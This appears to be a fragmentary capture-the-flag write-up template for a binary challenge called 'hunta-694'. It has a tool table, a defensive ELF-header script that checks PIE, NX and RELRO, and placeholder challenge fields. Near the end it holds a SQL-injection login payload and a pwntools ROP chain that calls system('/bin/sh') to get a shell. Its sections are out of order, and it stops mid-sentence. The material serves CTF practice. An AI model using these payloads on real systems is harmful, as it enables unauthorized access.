| Tool | Command | What to look for |
|------|---------|------------------|
| | Open the binary | Function names, `main`, suspicious `strcpy`, `gets`, `system` calls |
| objdump | `objdump -d -M intel hunta-694` | Disassembly for gadgets or vulnerable patterns |
| radare2 | `r2 -A hunta-694` → `aaa` | Auto-analysis, function list (`afl`), cross-references (`axt`) |
| readelf | `readelf -a hunta-694` | Section permissions (`.got`, `.plt`), NX/PIE/ASLR status |
| nm | `nm -D hunta-694` | Exported symbols (if any) |
| checksec | `checksec --file=hunta-694` | Stack canaries, RELRO, PIE, NX |
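As an added example (not part of this write-up template), the following script reads the ELF64 header and program headers directly and reports three of the hardening facts the `checksec` row above refers to: PIE, NX and RELRO. It is useful for confirming that a build you ship actually carries those mitigations; `build_elf64` is a constructed header-only fixture for offline testing, not a real binary, and stack canaries are omitted because they require symbol lookup rather than header parsing.

```python
import struct
import sys

ET_DYN = 3                 # e_type for position-independent executables
PT_GNU_STACK = 0x6474E551  # program header describing stack permissions
PT_GNU_RELRO = 0x6474E552  # program header marking the read-only-after-relocation region
PF_X = 0x1                 # executable segment flag


def parse_program_headers(data):
    """Return (e_type, [(p_type, p_flags), ...]) from a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        phdrs.append((p_type, p_flags))
    return e_type, phdrs


def mitigations(data):
    """Report PIE, NX and RELRO the way checksec does, from headers alone."""
    e_type, phdrs = parse_program_headers(data)
    stack_flags = [f for t, f in phdrs if t == PT_GNU_STACK]
    return {
        "PIE": e_type == ET_DYN,
        # No PT_GNU_STACK at all means the kernel falls back to an executable stack.
        "NX": bool(stack_flags) and not (stack_flags[0] & PF_X),
        "RELRO": any(t == PT_GNU_RELRO for t, _ in phdrs),
    }


def build_elf64(e_type, phdrs):
    """Constructed fixture: a bare ELF64 header plus program headers, no code."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0, 64, 0, 0,
                               64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return ehdr + body


if __name__ == "__main__":
    if len(sys.argv) > 1:  # inspect a real binary given on the command line
        with open(sys.argv[1], "rb") as fh:
            print(mitigations(fh.read()))
    else:  # otherwise show a hardened and a weak constructed fixture
        print("hardened:", mitigations(build_elf64(ET_DYN, [(PT_GNU_STACK, 0x6), (PT_GNU_RELRO, 0x4)])))
        print("weak:    ", mitigations(build_elf64(2, [(PT_GNU_STACK, 0x7)])))
```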
Then use the leaked address to compute `libc_base` and continue with a ROP chain.
| Field | Value (to be filled) |
|----------------------|----------------------|
| | hunta-694 |
| Category | (e.g., Pwn / Web / Crypto / Reverse / Forensics) |
| Points | (e.g., 200) |
| Provided Files | `hunta-694` (binary / zip / source code), `README`, `Dockerfile`, etc. |
| Connection Details | `nc huntu.ctf.example.com 1337` (if remote) |
| Goal | Retrieve the flag in the format `CTF...` |
```python
import requests

url = "http://challenge.ctf/hunta-694/login"
# Form fields posted to the login endpoint
payload = {"username": "admin'--", "password": "x"}
r = requests.post(url, data=payload)
print(r.text)  # Should reveal flag or a session cookie
```
```python
from pwn import *

# offset, pop_rdi, bin_sh, system and io are resolved earlier in the exploit script
rop_payload = flat(
    b'A' * offset,  # padding up to the saved return address
    pop_rdi,        # pop rdi; ret gadget
    bin_sh,         # address of the "/bin/sh" string
    system,         # address of system()
)
io.sendlineafter(b'> ', rop_payload)
```
Once the exploit is successful, you typically receive a shell or a direct flag output. The flag format is usually: